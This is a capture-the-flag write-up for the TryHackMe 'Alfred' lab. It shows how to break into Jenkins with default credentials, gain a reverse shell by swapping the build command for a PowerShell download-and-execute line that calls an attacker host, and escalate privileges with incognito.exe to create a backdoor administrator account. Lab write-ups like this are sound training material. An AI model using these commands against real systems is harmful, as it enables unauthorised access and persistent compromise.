TryHackMe Alfred writeup

TryHackMe Alfred writeup

Alfred is the second machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

Enumeration

The output of the nmap scan:

nmap -sC -sV 10.10.0.34

80/tcp   open  Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
8080/tcp open  Jetty 9.4.z-SNAPSHOT

Port 8080 contains Jenkins login page. According to Jenkins documentation, default credentials should be the admin:password pair, but this is not the case. The first option to check is other “default” password pairs. admin:admin will do the trick this time.


Exploitation

A few words about Jenkins before we move on:

Jenkins – an open source automation server which enables developers around the world to reliably build, test, and deploy their software.

From the attacker’s perspective, this is a goldmine. First, you can execute system commands with it. Second, already-created projects and builds might contain a ton of priceless data.

We can see that Jenkins already has a build for the project named, well, project.

Navigate to the configurations of the project:

http://10.10.0.34:8080/job/project/configure

We are looking for the Build section of it. You can see that to make a new build, Jenkins execute a Windows bash command and running whoami command. Let’s replace the whoami command and download a reverse shell to our Kali Linux machine.

A common way to do that with the Windows box is to use something like nishang PowerShell reverse shell.

Simply add the line to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.11.19.53 -Port 1337

Serve the HTTP server to host that file by executing the following command:

sudo python -m SimpleHTTPServer 80

Prepare a listener on the port 1337 with nc:

sudo nc -nlvp 1337

We are done with preparations on the Kali Linux side, let’s modify the Build command in Jenkins now. Replace the whoami with the following:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.19.53/Invoke-PowerShellTcp.ps1')

Hit the Build Now and take a break for a second. Jenkins will make a new build and by doing that, it will also download and execute your reverse shell as a user bruce.


PrivEsc

Let’s check what privileges the user bruce has:

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled

The official guide covers only the way to do it with Metasploit, but of course, you can do the same without it.

The role SeImpersonatePrivilege allows you to impersonate a client. We can exploit that to gain privileged access to the local system. The official guide is also offering you the incognito module for Metasploit, but you can download it as a stand-alone binary. Transfer incognito.exe to the machine in any preferred way. If you don’t have one, you can use this PowerShell one-liner:

(New-Object System.Net.WebClient).DownloadFile("https://<YOUR_IP>/<FILE_NAME>", "C:\<PATH_TO_THE_FILE><FILE_NAME>")

When you will have your file on the box, you can impersonate NT AUTHORITY\SYSTEM token as the official guide recommends you, but you could also create a new user with admin rights:

PS C:\users\public\Documents> ./incognito.exe add_user carrotcake SuperSecretPassw0rd123                             
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to host 127.0.0.1                                                              
[+] Successfully added user                 


PS C:\users\public\Documents> ./incognito.exe add_localgroup_user Administrators carrotcake                          
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.                                                
[*] Enumerating tokens                                                                                               
[*] Attempting to add user carrotcake to local group Administrators on host 127.0.0.1                                
[+] Successfully added user to local group

Here we are creating a new user carrotcake with the password SuperSecretPassw0rd123 via incognito.exe, and then adding this account to the local group Administrators.

You can now try to log in to the box with a new account. We can use RDP protocol as the port 3389 is open:

rdesktop -u carrotcake -p SuperSecretPassw0rd123 10.10.0.34

OR you can use the tool Remmina instead of rdesktop. It has a built-in screenshot taker and works way more stable in my taste. How to install Remmina


Takeaway

  • You don’t have to always look for a way to exploit the service. Sometimes you just need to use it

  • Understanding the environment can help you to achieve your goals

  • Creating a new user sometimes might be the easiest way to get persistent access to the system